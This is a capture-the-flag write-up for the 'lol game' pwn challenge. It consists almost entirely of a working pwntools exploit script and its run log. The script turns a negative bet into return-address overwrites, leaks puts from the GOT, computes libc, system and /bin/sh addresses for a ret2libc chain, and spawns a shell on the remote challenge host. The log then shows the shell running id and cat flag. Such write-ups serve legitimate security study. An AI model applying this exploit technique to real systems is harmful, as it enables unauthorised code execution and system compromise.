# **=== lol game (Pwn: 14 solves / 831 pt) ===**

```
from pwn import *
import sys

#context(os='linux', arch='i386')
#context.log_level = 'debug'

BINARY = './LOLgame'
elf = ELF(BINARY)
#
# Although libc is not given, it can be searched at the following URL.
# https://libc.blukat.me/
# => "libc6-i386_2.24-9ubuntu2_amd64"
#

puts_plt_addr = elf.plt['puts']
puts_got_addr = elf.got['puts']
main_addr = 0x8048430

if len(sys.argv) > 1 and sys.argv[1] == 'r':
s = remote("lolgame.acebear.site", 3004)
remote = 1
else:
s = process(BINARY)
libc = elf.libc
remote = 0

def Play(point):
s.recvuntil("Your Choice:\n")
s.sendline("1")
s.recvuntil("Enter Your Bet Point: ")
s.sendline("-" + str(point))
for i in range(1, 4):
s.recvuntil("Enter row: ")
s.sendline(str(i))
s.recvuntil("Enter column: ")
s.sendline(str(i))

def Change(name):
s.recvuntil("Your Choice:\n")
s.sendline("3")
s.recvuntil("Enter your name: \n")
s.sendline(name)

def Exit():
s.recvuntil("Your Choice:\n")
s.sendline("4")

s.recvuntil("Enter your name: \n")
s.sendline("1")

Change("A"*16+"\x39")
Play(puts_plt_addr) # change return address => PLT address of puts()
Change("A"*16+"\x3a")
Play(main_addr) # return main()
Change("A"*16+"\x3b")
Play(puts_got_addr) # for leaking GOT address of puts()

Exit()

r = s.recv(4)
r = s.recv(0x18)
puts_addr = u32(r[0:4])
if remote :
libc_base_addr = puts_addr - 0x05f940 # libc6-i386_2.24-9ubuntu2.2_amd64
system_addr = libc_base_addr + 0x03a900 # libc6-i386_2.24-9ubuntu2.2_amd64
binsh_addr = libc_base_addr + 0x15d00f # libc6-i386_2.24-9ubuntu2.2_amd64
else:
libc_base_addr = puts_addr - libc.symbols['puts']
system_addr = libc_base_addr + libc.symbols['system']
binsh_addr = libc_base_addr + next(libc.search('/bin/sh'))

print "puts_addr =", hex(puts_addr)
print "libc_base_addr =", hex(libc_base_addr)
print "system_addr =", hex(system_addr)
print "binsh_addr =", hex(binsh_addr)

s.recvuntil("Enter your name: \n")
s.sendline("1")

Change("A"*16+"\x39")
Play(system_addr)
Change("C"*16+"\x3b")
Play(binsh_addr)

Exit()

s.interactive()
```

```
root@kali: # python exploit.py r
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Opening connection to lolgame.acebear.site on port 3004: Done
puts_addr = 0xf7e22940
libc_base_addr = 0xf7dc3000
system_addr = 0xf7dfd900
binsh_addr = 0xf7f2000f
[*] Switching to interactive mode
Bye!$ id
uid=1000(lolgame) gid=1000(lolgame) groups=1000(lolgame)
$ cd /home/lolgame
$ cat flag
AceBear{tH4_r00t_1s_pr0gr4m_l3u7_u_are_hum4n}
```